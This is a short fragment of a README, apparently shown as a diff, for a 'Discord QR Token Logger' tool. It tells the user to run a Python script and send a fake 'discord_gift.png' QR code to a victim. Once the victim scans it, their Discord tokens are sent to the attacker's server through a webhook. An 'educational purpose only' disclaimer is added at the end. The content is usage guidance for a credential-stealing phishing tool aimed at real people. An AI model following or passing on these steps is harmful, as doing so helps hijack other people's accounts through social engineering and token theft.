9P9/Discord-QR-Token-Logger/README.md

 python3 QR*
 ```
 Last Step, Send discord_gift.png You Generated Just Now To Victim And Wait For Him To Scan The Image.Boom!
 His Tokens Will Send To Your Server By Webhook

+### Disclaimer
+This Tool Is For Educational Purpose Only.I Do Not Responsible For Anything Happened.